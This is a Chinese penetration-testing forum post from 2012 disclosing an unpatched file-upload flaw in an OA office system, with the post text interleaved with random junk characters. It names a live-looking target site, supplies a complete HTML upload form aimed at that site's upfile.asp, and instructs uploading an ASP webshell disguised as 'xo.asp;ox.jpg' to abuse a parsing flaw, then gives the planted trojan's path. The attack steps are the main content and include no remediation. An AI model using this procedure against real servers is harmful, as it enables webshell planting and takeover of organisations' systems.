找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 全能OA办公系统0day OA办公系统漏洞 上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2141|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞( x* Q4 B1 h  K: p% |$ K

- y  O; x- j3 ^0 ^- E6 @+ P, J系统介绍:
4 f( ]+ u4 n2 `, q% Z. i. s1 F( {6 w: a6 [/ n. N
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。! [/ \  x' O- H# e9 R% w

1 v  |, t% f3 V主要功能:
1 b$ W+ f( ]* W% |- A& B公司通告 / j6 R& q7 E5 H0 c
工作计划
8 X1 H6 ?- Z# o  t通讯助理
: J( e+ H4 u$ N9 B8 V% c. }客户资源 & H* G) K; B( W4 w- R, w/ U5 n0 }
我的公文
, O6 L" E2 E1 K公文传阅
* M6 A1 N8 T7 U5 q% T公共资源
, s, B8 B& D' T  l资源预约 2 ?* q. C+ Q, D) W
今日考勤 ( S# A' M3 j. ?2 b" x1 L
个人计划
0 j+ w6 q& `% V$ m' z" @个人通讯录 + z% t! R0 I1 x' v
个人基本档案 - u7 e" w: k7 L8 i: _! U, n
未读邮件
( j3 X& h6 z) `8 ?& v发邮件
, m  C3 L. n# j: s7 x8 K收件夹
- E5 b" w2 a$ ^7 R8 Y. e寄件夹
3 H: X) Z( U: t6 O网络硬盘 5 k( J3 [  ?9 l# L
网络会议
2 v! V! n/ u! l! F' L( M, x) g2 A网络调查
2 y' z1 _& p! B. r* ?' Q) r交流论坛
5 L; a8 p: b1 g4 n$ ^, K& [
" \; i; c- ]0 P& K' K4 B有兴趣测试的朋友可以下源码看看$ A' B, i3 p- E  w* G+ r
1 I/ S( t; h# m  j
源码下载:
" j) I. G! a2 F: a3 }3 n$ ?- x
0 U% t/ e6 s8 K* s5 Fhttp://www.mycodes.net/30/4750.htm
" M% b- R8 |) p$ K: n6 y! m2 K, b
2 x" X) E2 z# s" K漏洞介绍:
( _! h) Y8 u% u# ?, f2 y6 N: y1 E0 E1 y8 U+ W! M% k
由upfile.asp上传文件漏洞引起
0 q2 ^$ `; L( \/ B' O0 f8 [, s# e6 c& p$ R$ C) D" h
测试方法:* q1 s$ X: P  h: u7 Z
, u% K7 T) l) n$ A! B! ~
使用名小子上传http://www.itlynn.com/upfile.asp即可
0 F2 o, g4 D8 @: |4 m: ]* S) h8 b$ C* [) y
如果upfile.asp文件被删除不存在。
  X/ ^1 L+ {( Y& s- t* C3 A! b% h9 v% S9 U% y' D+ A
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
' V5 j# R6 L( ?( ?$ k; ~: z, I( c1 l! E( w+ P1 |& D, E  l) S8 T+ T
如果存在那么将如下代码保存为upfile.html。# J+ F( K8 ~- q( ~2 h. }

# d8 y/ k& j' ~! Y) q- i# Y然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
- }* S! D2 t$ Z) s/ [6 @. ]* A
$ H3 w# s! O$ H) J- Y
: I! ]5 F8 F$ U. v9 w
1 p. M! p2 |& W% D01 <table border='0' align="center" cellpadding="5">
" h; I1 B. p" H" K9 w" c. d3 v6 p/ F7 I6 u* Y( k) p
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
+ p7 _( x4 _2 I6 T2 G- J! E2 T: V# ]7 m; T' Q2 v  o! A: {1 a
03 <tr>
; W/ s3 k, N4 v" m- e* b
) F( M) @( f, J- C+ x# o04             <td>报错:</td> 2 i6 D9 |# c( C, j/ d/ B( {

9 Q7 C; m+ M8 E5 I8 X" Z& ~05             <td><input type='radio' name='errnumber' value='0'> 9 d6 A7 w. [: w$ \

2 M. R1 y' |- N: e4 m6 Z06               自动更名
3 g0 h  c2 z5 y: d/ P- e4 E; L$ W9 c5 t+ e9 |6 v* v
07               <input type='radio' name='errnumber' value='1' checked> - O6 x1 i: f- L" m: [1 K
# r: }9 w( Q  l& Z
08               报错方式 5 z% q9 p: i: j2 i5 C3 i
; r- W  t% U- w7 P5 U& S, K
09               <input type='radio' name='errnumber' value='2'>
! q8 X4 T! a$ f
7 \( c$ ~. [% E( c+ ?6 P5 o10               直接覆盖</td>
  _' L2 C8 u! A3 v4 l) F, I$ q, @' e. A+ k& S- g' B4 r/ J( U. ]
11           </tr>
6 s4 S- E; x+ b* h5 ]$ l# F6 l- ~8 O, a5 a- B
12           <tr>
2 J' W; O$ S# \( l- ]" ^
# B# K8 H' p# r" f# T8 s/ X+ E) x# @: `( m13             <td>主题:</td>
: b+ B/ n1 R1 F, x
+ L7 T1 {. n+ I& V5 H+ e1 L+ a4 {4 z14             <td><input type='text' name='filename' size='30'></td> 2 t. X3 Y. W" [. C1 A: ~
  ^9 r8 q# m8 @) g5 R
15           </tr> 2 K  r+ H8 v% o. s; q2 k6 M+ w
5 {- z  ?1 D% @% e) _& J1 v
16           <tr> 9 t( E* f) d& }* o9 O7 o! R
1 D# E' J% U# ^
17             <td>文件:</td> : k6 A5 J; I( \6 ~

& f' w% T% m8 E1 r18             <td><input type="file"name="fruit"size="30"></td>
% t1 C" s1 w7 q" N; D! O2 w' M" A+ h% C
19           </tr>
5 I. f1 k8 U9 r% ]/ V9 T; a6 r/ i7 J0 U/ O9 w* A
20           <tr>   Q) o6 z2 L% |+ S; u! B

% E+ `# ?# x# l' N21             <td valign='top'>简介:</td> ( U" N( n1 t2 t4 i3 h$ ~1 H, l( t6 Q
. b; }! y* `% g8 [; J
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
5 T1 Y- P" s( Q6 Y$ J- ]5 v0 ^: s2 @: M. P/ c* ]
23           </tr> 2 K' X* b0 n$ a3 }9 A1 q0 U& ?
" U, z$ d& O" \$ p" @* D% C
24   / n6 g4 n; F1 @3 b/ {

, ?- j) M0 S" W$ z5 W25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
5 Z" O. X6 Q( I. Q1 ?5 D! n
$ `) e# P2 G! z4 L7 F, o# b. I6 x. G26           </tr>   t) m7 i" @7 t( C5 e5 Y9 R2 Y4 }; y

% ?/ n4 j, L- G; _& j. f1 b. f27         </form> " k* t0 I) J5 K, k+ d% R& J2 l7 I
" G8 K" F" j6 {9 d$ ]6 X" r
然后打开上传一个文件名为xo.asp;ox.jpg的文件。0 }3 O! D7 N' ^' Q) W, B+ `) q
  ^# l9 ~8 [( E; z8 g  r4 {

/ m1 q. w8 o8 t2 W, n" r# o, O, G; G  ?9 l7 ?
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
% M7 N4 {7 ]* w4 l' S
$ X; t$ }5 x- U8 p7 g( o7 C此漏洞需要配合解析漏洞利用。3 Y; U0 ^4 R7 N( v  x) C# T1 J1 f
* a' _9 m* o% R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表